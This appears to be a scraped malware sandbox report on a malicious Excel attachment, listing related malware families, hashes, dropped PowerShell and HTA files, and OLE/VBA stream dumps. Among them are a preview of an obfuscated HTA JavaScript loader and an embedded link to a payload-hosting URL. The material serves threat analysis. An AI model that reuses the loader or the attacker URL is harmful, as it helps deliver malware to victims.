	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	200.72.209.81
	m68k.elf	Get hash	malicious	Mirai	Browse	186.10.182.179

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	gr5zS9wytq.bat	Get hash	malicious	Unknown	Browse	193.30.119.205
	FHG538JGH835DG86S.doc	Get hash	malicious	DarkTortilla, XWorm	Browse	193.30.119.205
	New RFQ20241142.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse	193.30.119.205
	QUOTATION.xls	Get hash	malicious	HTMLPhisher	Browse	193.30.119.205
	Payment Advice.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	193.30.119.205
	Order Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	193.30.119.205
	7qsPAygCOx.xlsx	Get hash	malicious	Snake Keylogger	Browse	193.30.119.205
	DGTCkacbSz.xlsx	Get hash	malicious	Snake Keylogger	Browse	193.30.119.205
	OC25-11-24.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	193.30.119.205
	Shipping Document.xls	Get hash	malicious	HTMLPhisher	Browse	193.30.119.205
7dcce5b76c8b17472d024758970a406b	New RFQ20241142.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse	152.231.102.107
	QUOTATION.xls	Get hash	malicious	HTMLPhisher	Browse	152.231.102.107
	Payment Advice.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	152.231.102.107
	Order Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	152.231.102.107
	OC25-11-24.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	152.231.102.107
	Shipping Document.xls	Get hash	malicious	HTMLPhisher	Browse	152.231.102.107
	Dl2EmyL53n.doc	Get hash	malicious	Unknown	Browse	152.231.102.107
	P0-4856383648383364838364836483.xls	Get hash	malicious	Unknown	Browse	152.231.102.107
	P0-4856383648383364838364836483.xls	Get hash	malicious	Unknown	Browse	152.231.102.107
	kXPgmYpAPg.doc	Get hash	malicious	Unknown	Browse	152.231.102.107

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4742
Entropy (8bit):	4.8105940880640246
Encrypted:	false
SSDEEP:	96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
MD5:	278C40A9A3B321CA9147FFBC6BE3A8A8
SHA1:	D795FC7D3249F9D924DC951DA1DB900D02496D73
SHA-256:	4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
SHA-512:	E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
Malicious:	false
Preview:	PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines (65536), with no line terminators
Category:	modified
Size (bytes):	1105583
Entropy (8bit):	1.9956117684468122
Encrypted:	false
SSDEEP:	48:4FQBrUzoZMa9/9W5vMk9lrfdVvFT+iL4ZQ:4uUEZMa910Mk9BfdVvB+i0ZQ
MD5:	AE4E1B2E9C0AAD7875DD25F1C3F471D4
SHA1:	EB8AC52F7949061D1649CBC991A99BFCB049E990
SHA-256:	D5EACAF57F04B6810E94A60B83B3410E50B171EC84EE405B2C375C1E7873B426
SHA-512:	D1DFABFF197BF1B11143919D069D2F562B8CB9E12195C76AB5D4F174B132A83F16B9C395A664F600BDFC2FA66D8013E0AF7EF207B6593C2640B0ABE6AEF05D6D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall[1].hta, Author: Joe Security
Preview:	<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253CScript%252520Language%25253D%252527Javascript%252527%25253E%25250A%25253C%252521--%252520HTML%252520Encryption%252520provided%252520by%252520tufat.com%252520--%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252527%2525253C%25252573%25252563%25252572%25252569%25252570%25252574%25252520%2525256C%25252561%2525256E%25252567%25252575%25252561%25252567%25252565%2525253D%2525254A%25252561%25252576%25252561%25252553%25252563%25252572%25252569%25252570%25252574%2525253E%2525256D%2525253D%25252527%25252525%25252533%25252543%25252553%25252563%25252572%25252569%25252570%25252574%25252525%25252532%25252530%2525254C%25252561%2525256E%25252567%25252575%25252561%25252567%25252565%25252525%25252533%25252544%25252525%25252532%25252537%2525254A%25252561%25252576%25252561%25252573%25252563%25252572%25252569%25252570%25252574%25252525%25252532%252

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Nov 26 14:49:13 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.9900148295663955
Encrypted:	false
SSDEEP:	24:Hoe9EurPa4odHMhwKdNWI+ycuZhNwakSMPNnqSqd:1rErKd41ulwa3cqSK
MD5:	D9A5997007E4288155B12C5615232559
SHA1:	2DB6D12A1083BDDC2491A900A9441D9D31C313A7
SHA-256:	EED1D432AB5C28CE6439946984FB0D185C64EA19268B3571D4571FD4661DDEE1
SHA-512:	3325224E07141F6CE0CC826612EDD154AC71398BD132810A7ABFA8E3D34B4293781AFE5F9FA07B757568A09DEEDA00E929921A66637A954B833B0A59147208F7
Malicious:	false
Preview:	L.....Eg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\cfogy1ty\CSCDB27D48C833B4E44BF14917DCA05AE4.TMP................U/.l".'....6..B...........4.......C:\Users\user\AppData\Local\Temp\RES59C4.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.f.o.g.y.1.t.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 26 08:28:59 2024, Security: 1
Entropy (8bit):	7.8688847864338625
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Shipping Document.xla.xlsx
File size:	240'640 bytes
MD5:	54649fa2a8306383f72c8d8299a40998
SHA1:	873a48d89b2a2110c2edd79792fc1bdb13105d8d
SHA256:	ed2615dc3a9adfa6b3c4f5257f9497349f0fcca5d17e9c94622bf7af4db68a3b
SHA512:	d9cedc43c4eece48367796f618b1675191d7c970e0c742cfad84e43295854ae44fa5c62c1121bb8d247264e3b6d8bbb61adaa9627da6c7dbf4ccdeeacd9bc22b
SSDEEP:	6144:lAu6v55RblUIF8w+2TFnPQfJiw/EHeVkSFfmmk:TE5Ut2TFofpgeVkS0
TLSH:	8F3412183399D641D2421A78DEC0CAA723B9FDA0AD33875B315C771F113B9E9894BF0A
File Content Preview:	........................>...................................$...................h.......j......................................................................................................................................................................

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-11-26 08:28:59
Creating Application:	Microsoft Excel
Security:	1

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 d3 ad 6e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . z . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 d3 7a d9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 d3 dc b5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . _ ^ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 d3 5f 5e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2920681057018664
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . = ? . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

General
Stream Path:	MBD004A267B/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD004A267B/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	16804
Entropy:	7.59049937623385
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD004A267C/\x1Ole
CLSID:
File Type:	data
Stream Size:	908
Entropy:	5.086021196979637
Base64 Encoded:	False
Data ASCII:	. . . . ^ b . 4 . . . . . . . . . . . . . v . . . y . . . K . r . . . h . t . t . p . s . : . / . / . l . j . g . . . c . l . / . w . f . U . P . ? . & . a . c . t . i . o . n . = . h . i . s . t . o . r . i . c . a . l . & . r . u . b . b . e . r . = . s . h . r . i . l . l . & . g . a . l . l . o . n . = . c . l . o . u . d . y . & . p . o . c . k . e . t . b . o . o . k . = . i . n . e . x . p . e . n . s . i . v . e . & . j . u . m . p . s . u . i . t . = . n . i . c . e . & . h . e . e . l . . . . _ r
Data Raw:	01 00 00 02 ff 5e 9e 62 cd 94 34 2e 00 00 00 00 00 00 00 00 00 00 00 00 76 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 72 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6c 00 6a 00 67 00 2e 00 63 00 6c 00 2f 00 77 00 66 00 55 00 50 00 3f 00 26 00 61 00 63 00 74 00 69 00 6f 00 6e 00 3d 00 68 00 69 00 73 00 74 00 6f 00 72 00 69 00 63 00 61 00 6c 00 26 00 72 00

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	207228
Entropy:	7.997253318602257
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . g O . u Z o . . A B . ( ) < p L . . z . " . . . . . . . . . . . . . \\ . p . N o . f Q y i p $ m . g z R . , E m m } { - g . . R . . f . . _ N z w . - . ' w 0 9 h 6 n n ; z . c 3 < 0 . ! 4 . . . A ! . B . . . % & a . . . . z . . . = . . . ; 8 Y y . . . . l t B q * ^ Z . . . . . . . . . . . . . v . . . . . . . . . . . 7 B = . . . I . I . L . ( Z . @ . . . J 9 . . . _ " . . . . . . . [ . . . . v n . . . < 1 . . . 8 t 5 ' s M ` X . $ . F , - { ~ . 1 . . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 93 96 d2 c3 d8 95 67 a0 8d 4f e8 0a 75 c0 5a 6f 89 fe c4 7f e8 dd 03 cd e5 a1 41 ac 42 14 28 81 29 3c f4 70 4c 98 0f da 03 b4 ea f7 7a fb 15 22 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 eb b0 e2 00 00 00 5c 00 70 00 a4 86 4e 6f 11 66 51 79 69 70 24 6d 09 67 d8 f9 7a 52 05 2c 84 bd 45 dd f9 6d

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	529
Entropy:	5.2827899145053
Base64 Encoded:	True
Data ASCII:	I D = " { 5 1 5 8 A 5 1 6 - 7 D B 5 - 4 E B 4 - A C 4 8 - 6 F 0 F 9 2 7 8 2 9 6 5 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 4 0 6 C B 7 D D B 2 1 D F 2 1 D
Data Raw:	49 44 3d 22 7b 35 31 35 38 41 35 31 36 2d 37 44 42 35 2d 34 45 42 34 2d 41 43 34 38 2d 36 46 30 46 39 32 37 38 32 39 36 35 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2644
Entropy:	3.978657076361297
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Shipping Document.xla.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall[1].hta

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethebestthingsentiretimewhichgivenbestdesignforyourthings[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2CE26E2F.emf

C:\Users\user\AppData\Local\Temp\RES59C4.tmp

C:\Users\user\AppData\Local\Temp\aj3dxxyj.sdq.ps1

C:\Users\user\AppData\Local\Temp\cfogy1ty\CSCDB27D48C833B4E44BF14917DCA05AE4.TMP

C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.0.cs

C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline

C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.dll

C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.out

C:\Users\user\AppData\Local\Temp\f0jno0lq.ubw.psm1

C:\Users\user\AppData\Local\Temp\jmyblxmo.x0v.psm1

C:\Users\user\AppData\Local\Temp\lag13pa5.rx0.ps1

Windows Analysis Report
Shipping Document.xla.xlsx

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	553
Entropy:	6.384815373546849
Base64 Encoded:	True
Data ASCII:	. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . W i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
